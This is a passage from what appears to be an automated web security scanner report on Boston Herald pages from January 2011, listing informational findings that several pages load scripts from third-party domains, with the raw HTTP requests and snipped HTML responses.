<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.666. http://www.bostonherald.com/news/national/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/general/view.bg?articleid=1312579 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.667. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.668. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.669. http://www.bostonherald.com/news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.670. http://www.bostonherald.com/news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.671. http://www.bostonherald.com/news/obituaries/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/obituaries/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/obituaries/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.672. http://www.bostonherald.com/news/offbeat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/offbeat/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/offbeat/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:32:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.673. http://www.bostonherald.com/news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.674. http://www.bostonherald.com/news/opinion/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/opinion/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/opinion/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
